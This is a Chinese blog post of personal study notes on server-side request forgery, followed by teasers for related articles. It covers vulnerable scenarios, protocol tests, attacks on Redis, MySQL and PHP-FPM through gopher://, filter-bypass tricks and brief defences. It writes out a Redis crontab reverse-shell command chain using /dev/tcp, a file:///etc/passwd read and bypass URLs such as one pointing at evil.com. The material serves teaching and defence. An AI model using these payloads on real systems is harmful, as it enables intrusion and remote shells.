SSRF漏洞分析和防御

最新推荐文章于 2025-04-09 22:10:23 发布
最新推荐文章于 2025-04-09 22:10:23 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: 网络安全学习笔记 文章标签: 安全 安全漏洞 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44033675/article/details/116279231
版权

目录

简介

  服务端伪造请求(server side request forgery)是一种通过构造数据进而伪造服务器发起请求的漏洞。

  请求是由内部发起,一般SSRF漏洞攻击的目标往往是从内网无法访问的内部系统。由攻击者构造的攻击链接传给服务端执行造成的漏洞,

  XSS是利用客户端发起请求;SSRF是利用服务器发起请求。

存在场景

  SSRF漏洞一般出现在有调用外部资源的场景中,如社交服务分享功能、图片识别服务、网站采集服务、远程资源请求(wordpress xmlrpc.php)、文件处理服务(XML解析)等。

SSRF漏洞测试
尝试是否能控制、支持常见的协议
file:// 从文件系统中读取文件内容

eg:file:///etc/passwd

dict:// 字典服务器协议,让客户端能够访问更多字典源,可以获取目标服务器上运行的服务版本等信息。

dict://ip:6739/info (redis)

gopher:// 分布式的文档传递服务。

SSRF利用

一、使用Gopher协议扩展攻击面
1. 攻击Redis(是key-values存储系统,是跨平台的非关系数据库 详细->菜鸟教程)
redis支持五种数据类型:string(字符串),hash(哈希),list(列表),set(集合)及zset(sorted set:有序集合)(一般运行于内网,使用者大多将其绑定于127.0.0.1:6379)

redis-cli //连接redis服务 加上–raw解决中文乱码
redis-cli -h host -p port -a password //远程登陆
一般通过写入crontab反弹shell
(注:Linux crontab是用来定期执行程序的命令,crond 命令每分锺会定期检查是否有要执行的工作,如果有要执行的工作便会自动执行该工作。)

攻击流程:
	1、redis-cli flushall
	2、echo -e "\n\n*/1 * * * * bash -i /dev/tcp/172.28.0.3/1234 0>&1\n\n" | redis-cli -x set 1 redis-cli config set dir /var/spool/cron/   
	(指定shell为bash,编辑contab文件的内容任务,
	每一分钟编辑-e后面的指令,蓝色redis设置键值,
	把反弹shell写入配置文件)
	3、redis-cli config set dbfilename root
	4、redis-cli save
	5、 然后将全部数据转换成Gopher协议的URL。
	最后数据需要在urlencode编码一次

(自动组装Gopher Gopherus
最后数据需要在urlencode编码一次在这里插入图片描述
二、攻击MYSQL
MYSQL客户端连接服务端方式有4种,UNIX套接字,内存共享,命名管道,TCP/IP套接字
攻击流程举例:
a. 使用tcpdump -i lo port 3306 -w /pcap/mysql.pcap抓包
b. 用户登录MYSQL正常操作
c. 利用wireshark打开mysql.pcap,导出客户端到服务端的数据
d. 进行URL编码构造gopher协议
e. Payload :页面URL/?url=gopher://本地ip:port/_数据包需要在urlencode编码一次
在这里插入图片描述
三、PHP-FPM攻击
PHP-FPM是实现和管理FastCGI的进程。通信可分为两种:TCP和UNIX套接字。
TCP模式是本机上监听一个端口,默认端口号9000,Nginx会把客户端数据通过FastCGI协议传给9000端口,PHP-FPM拿到数据后会调用CGI进程进行解析。

Nginx配置文件如下:

Location ~ \.php${
	Index index.php index.html index.htm;

PHP-FPM配置文件:

listen=127.0.0.1:9000
	Include /etc/nginx/fastcgi_params;
	Fastcgi_pass 127.0.0.1:9000;
	Fastcgi_index index.php;
	Include fastcgi_params;
	}

通过伪造FastCGI协议包实现PHP任意代码执行。FastCGI协议只可以传输配置信息,需要被执行的文件名及客户端传进来的GET,POST,cookie等数据,然后通过更改配置信息来执行任意代码。
php://ini中有两个非常有用的配置项

a. auto_prepend_file:
在执行目标文件前,先包含auto_prepend_file中指定的文件,并且可以使用伪协议如php://input(php://input是客户端HTTP请求中POST的原始数据,如果将auto_prepend_file设定为php://input,那么每个文件执行前都会包含POST的数据,前提需要开启allow_url_include)
b. auto_append_file:在执行目标文件后,包含auto_append_file指向的文件。
限制条件:需要知道服务器上一个PHP文件的绝对路径,且security.limit_extensions配置项的后缀必须为.php,所一一般可以使用默认的/var/www/html/index.php

攻击内网中脆弱的web应用
将http数据包改为gopher协议的URL,执行command=uname -a

SSRF绕过

1. IP限制
使用Enclosed alphanumerics代替IP中的数字或网址中的字母。

ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ >>> http://example.com

参考:封闭式字母数字
在这里插入图片描述
用句号代替点

127。0。0。1 >>> 127.0.0.1

将IP地址转换进制
使用正则表达式过滤属于内网的IP地址,可绕过
十六进制前需加0x,八进制加0。
IP地址简写:
127.0.0.1写法:

ip地址中间的0可省略。
linux下 0代表127.0.0.1
windows下0代表0.0.0.0
127.0.0.1 -> 127.1
http://0

2. DNS 重绑定
3. 302跳转
xip.io服务类似DNS重绑定
127.0.0.1.xip.io解析成127.0.0.1,访问服务任意子域名都会重定向到子域名。

http://10.0.0.1.xip.io = 10.0.0.1
www.10.0.0.1.xip.io= 10.0.0.1
http://mysite.10.0.0.1.xip.io = 10.0.0.1
foo.http://bar.10.0.0.1.xip.io = 10.0.0.1
10.0.0.1.xip.name resolves to 10.0.0.1
www.10.0.0.2.xip.name resolves to 10.0.0.2
foo.10.0.0.3.xip.name resolves to 10.0.0.3
bar.baz.10.0.0.4.xip.name resolves to 10.0.0.4

4、限制指定域名

http://xample.com@evil.com

URL: [协议]😕/[用户名]:[密码]@[主机名/域名/IP]:[端口号]/[路径]/[文件]?[参数]

防御

1、关闭不必要的端口,例如只开放80,443,8080,8090等
2、限制请求的协议,例如限制只能是HTTP,HTTPS
3、使用DNS缓存或者Host白名单的方式
4、设置URl白名单或者限制内网IP等。

未完待续…

ssrf漏洞修复(ssrf漏洞修复方式)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-09 4316
区块链去中介化、共识机制、不可篡改的特点,增加数据流转效率,减少成本,实时监控资产的真实情况,保证交易链条各方机构对底层资产的信任问题。在区块链行业,地址追溯是一个相对敏感的话题。当然,地址追溯的方法并不限于以上提到的几点,而能够突破交易所的黑客也必然会使用各种反追溯的手段来应对,包括利用去中心化交易所套现,利用混币/搅拌机等技术手段阻碍追溯等。具体方法是通过区块链浏览器输入可疑地址,查询该地址的交易,从交易结果列表中寻找出大额的资金流向,按照新的流向打开每层地址,逐层深入查询,即可得出大额资金的流向图。
Nginx之轨迹】Nginx + Lua 实现 waf Web 应用防火墙(解决 nignx 加载失败问题:LuaJIT version which is not OpenResty‘s)
rkmhr_sef的博客
02-23 1002
—— 目录 —— 1. Lua ngx_lua_waf 简介 2. 前置问题 3. 安装配置各模块 4. 配置 Nginx 5. 检验是否添加模块成功 6. 配置安全防火墙 7. 详细设置安全防火墙 1. Lua ngx_lua_waf 简介 Lua 是一门轻量小巧的脚本语言,用标准C语言编写并以源代码形式开放 其设计目的是为了嵌入应用程序中,从而为应用程序提供灵活的扩展定制功能。 Lua 的应用场景:游戏开发、独立应用脚本、Web 应用脚本、扩展数据库插件如:MySQL Proxy
[漏洞篇]SSRF漏洞详解
最新发布
weixin_45565886的博客
04-09 836
[漏洞篇]SSRF漏洞详解
SSRF漏洞原理攻击与防御(超详细总结)
热门推荐
hello
04-09 7万+
SSRF漏洞原理攻击与防御 目录 CSRF漏洞原理攻击与防御一、SSRF是什么?二、SSRF漏洞原理三、SSRF漏洞挖掘四、产生SSRF漏洞的函数五、SSRF中URL的伪协议六、SSRF漏洞利用(危害)七、SSRF绕过方式八、SSRF防御 提示:以下是本篇文章正文内容,下面案例可供参考 一、SSRF是什么? SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF攻击的目标是从外网无法访问的内部系
SSRF漏洞的攻击与防御
公众号shadow sock7
10-15 2160
SSRF的成因看具体的后端实现TCP请求的库: 比如curl、php里的file_get_contents、fsockopen、Java里的openStream,HttpClient类,URLConnection等 https://drops.org.cn/PENETRATION/SSRF-Gopher-Attack-NoteBook.html 发起请求的库不同,决定了可以发起什么样类型的请求。 ...
SSRF防御
Binary2014的博客
01-09 1411
SSRF(Server-side Request Forge, 服务端请求伪造)。 由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务。 漏洞防护 禁用不需要的协议,仅仅允许httphttps请求,可以防止类似于file://, gopher://, ftp:// 等引起的问题。 服务端需要认证交互,禁止非正常用户访问服务; 过滤输入信息,永远不要相信用户的...
CSRF漏洞及防护策略
若明天不见
07-25 1141
CSRF全称为Cross Site Request Forgery,译为跨站请求伪造。CSRF指攻击者盗用了用户的身份,以用户的名义在其不知情的情况下发送恶意请求。CSRF的常见攻击常见包括:以用户的名义发送邮件、发送消息、购买商品、虚拟货币转账等。 本文主要描述了CSRF原理、CSRF的攻击类型及相关防护策略
SSRF漏洞原理与案例分析
weixin_46492701的博客
06-24 989
SSRF (Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统。
csrfssrf漏洞的原理是?如何防御利用csrfssrf漏洞
DXfighting_的博客
04-14 1076
Csrf原理: CSRF是一种依赖web浏览器的、被混淆过的代理人攻击。 防御csrf漏洞: 验证token,验证HTTP请求的Referer,还有验证XMLHttpRequests里的自定义header Ssrf漏洞原理: 很多web应用都提供了从其他的服务器上获取数据的功能。使用指定的URL,web应用便可以获取图片,下载文件,读取文件内容等。SSRF的实质是利用存在缺陷的web应用作为代理攻击远程本地的服务器。一般情况下, SSRF攻击的目标是外网无法访问的内部系统,黑客可以利用S
CSRFSSRF漏洞的总结
2302_80462925的博客
06-30 2045
CSRF,即跨站请求伪造(Cross-Site Request Forgery),是一种常见的 Web 应用程序安全漏洞。它通常发生在用户在某个信任的网站上保持登录状态,而同时访问了恶意网站的情况下。攻击者利用用户浏览器的自动发送请求功能,诱导用户在不知情的状态下,以其在信任网站上的合法身份执行恶意操作。CSRF 攻击的特点在于它利用了用户已经通过身份验证的会话,使得服务器误以为是合法用户发起的请求。这些恶意请求可能包括修改用户个人信息、进行转账、发布非法内容等,从而给用户网站带来严重的损失。
XSS、CSRF、SSRF漏洞原理以及防御方式
Love_Naive的博客
09-03 5705
这里写目录标题XSSXSS攻击原理:XSS的防范措施主要有三个:编码、过滤、校正CSRFCSRF攻击攻击原理及过程如下:CSRF攻击的防范措施:SSRFSSRF漏洞攻击原理以及方式SSRF漏洞攻击的防范措施XMLXSS、CSRF、SSRF的区别XSS、CSRF的区别 XSS XSS(Cross Site Scripting):跨域脚本攻击。 XSS攻击原理: 不需要你做任何的登录认证,它会通过合法的操作(比如在url中输入、在评论框中输入),向你的页面注入脚本(可能是js、hmtl代码块等)。 X
SSRF漏洞是什么,如何进行有效防护
HoewDec的博客
04-26 2195
SSRF是服务器对用户提供的可控URL过于信任,没有对攻击者提供的URL进行地址限制足够的检测,导致攻击者可以以此为跳板攻击内网或者其它服务器由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在。1、严格校验用户输入的URL,可以使用白名单过滤来限制输入,只允许特定的协议、主机端口,列如限制请求的端口为 http 常用的端口,80、443、8080、8090 等。图片加载存在于很多的编辑器中,编辑器上传图片处加载设定好的远程服务器上的图片地址,如果没对加载的参数做限制可能造成SSRF
别再裸奔了!网络安全SSRF漏洞攻防秘籍,从零基础到精通,收藏这篇就够了!
wananxuexihu的博客
03-28 1110
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
SSRF漏洞原理与防御
weixin_54786196的博客
11-03 248
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
SSRFSSRF漏洞攻击与防御
03-16 444
0x01 概述 SSRF(Server-side Request Forge, 服务端请求伪造)。 由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务。 0x02 SSRF的危害 扫内网 向内部任意主机的任意端口发送精心构造的Payload DOS攻击(请求大文件,始终保持连接Keep-Alive Always) 攻击内网的web应用,主要是使用GET参数就可以实现的攻击(比如struts2,sqli等) 利用file协议读取本
ssrf漏洞_SSRF漏洞攻击原理及防御方案
weixin_39992462的博客
12-08 339
01SSRF概念服务端请求伪造(Server-Side Request Forgery),指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。02SSRF的原理很多web应用都提供了从其他的服务器上获取数据的功能。使用指定的URL,web应用便可以获取图片,下载文件,读取文件内容等。SSRF的...
WEB渗透【9】SSRF漏洞攻击与防御
司徒荆的博客
01-05 565
SSRF漏洞攻击与防御
网络安全-SSRF漏洞原理、攻击与防御
关注网络安全、云原生安全
09-05 3万+
概述 SSRF(Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统(因为他是从内部系统访问的,所以它能够请求到与它相连而与外网隔离的内部系统。)。 原理 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档等等。SSRF漏洞通过篡改获取资源的请求发送给服务器(服...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值